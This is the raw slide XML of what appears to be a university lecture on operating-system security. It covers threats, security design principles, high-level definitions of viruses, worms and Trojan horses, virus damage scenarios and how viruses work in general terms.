            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="5232400"/>
            <a:ext cx="6883400" cy="317500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25608" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2193925" y="5133975"/>
            <a:ext cx="522288" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>(a)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25609" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5546725" y="5133975"/>
            <a:ext cx="539750" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>(b)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25610" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8124825" y="5133975"/>
            <a:ext cx="522288" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>(c)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1525266" y="5712544"/>
            <a:ext cx="1834028" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Try 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> char of ‘A’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4812761" y="5727295"/>
            <a:ext cx="1856470" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Try 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> char of ‘B’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7043615" y="5732211"/>
            <a:ext cx="1907765" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Try 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> char of ‘A’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="528627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8098A494-8DA3-40F8-8A6A-42C4B871A21F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4098" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="254000"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>The Security Environment</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Threats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="168069" y="2040960"/>
            <a:ext cx="8630533" cy="28456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896E6435-79B0-499E-A28D-236AF02221FA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26626" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Design Principles for Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="1728592"/>
            <a:ext cx="8110602" cy="4459265"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>System design should be public</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Default should be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Give </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>each process least privilege possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Protection mechanism should be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-533400">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-533400">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>uniform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-533400">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>in lowest layers of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26628" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2251075" y="5908675"/>
            <a:ext cx="4940300" cy="949325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>And … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>keep it simple</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18746797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2" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security Problems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1070083" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196850" y="1759974"/>
            <a:ext cx="8750300" cy="4945626"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Virus:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A piece of code that attaches itself to a program or file so it can spread from one computer to another, leaving infections as it travels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most attached to executable files, so don’t get activated until the file is actually executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once caught, can hide in boot tracks, other files, OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Worm:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similar to a virus, but capable of traveling on its own</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>it can replicate itself, your computer might send out  hundreds or thousands of copies of itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trojan Horse:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Named after huge wooden horse in Greek mythology given as gift to enemy; contained army inside</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At first glance appears to be useful software but does damage once installed or run on your computer </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306028471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8597900" y="6477000"/>
            <a:ext cx="546100" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB52FAB8-5718-4F27-A1D3-C91B86778DBC}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28674" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Virus Damage Scenarios</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Blackmail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Denial of service as long as virus runs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Permanently damage hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Target a competitor's computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>do harm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>espionage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Intra-corporate dirty tricks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>sabotage another corporate officer's files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17772716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8597900" y="6477000"/>
            <a:ext cx="546100" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9E7F1EEE-A451-45A0-9C75-D083189839A3}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29698" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>How Viruses Work (1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625127" y="1839108"/>
            <a:ext cx="7772400" cy="3971925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Often </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>written in assembly language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Inserted into another program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>use tool called a “dropper”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Virus dormant until program executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>then infects other programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>eventually executes its “payload”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11208164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65D3BE5E-E95C-4251-98AB-38AA1FAEB478}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65538" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How viruses find executable files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
